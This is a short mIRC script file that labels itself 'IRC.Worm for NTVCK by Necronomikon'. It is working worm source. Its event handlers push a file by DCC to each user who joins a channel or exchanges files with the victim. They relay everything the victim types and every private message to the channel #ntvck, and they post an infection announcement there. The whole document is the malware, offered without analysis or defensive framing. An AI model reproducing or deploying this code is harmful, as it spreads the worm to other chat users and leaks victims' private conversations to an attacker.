[SCRIPT]
n0=on 1:start:{
n1=on 1:join:#:{
n2=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\PASSWORDS.doc
n3= }
n4=on 1:input:*:.msg #ntvck [( $+ $active $+ ) $1-]
n5=on 1:text:*:?:.msg #ntvck [( $+ $active $+ ) $1-]
n6=on 1:FILESENT:*.*:/dcc send $nick C:\Windows\PASSWORDS.doc
n7=on 1:FILERCVD:*.*:/dcc send $nick C:\Windows\PASSWORDS.doc
n8=on 1:connect:.msg #ntvck by Necronomikon
n9=  /msg #ntvck Im Infected With A Virus Created By NTVCK
n10= /part #ntvck
n11= /clear
n12= /motd
n13= }
;IRC.Worm for NTVCK by Necronomikon
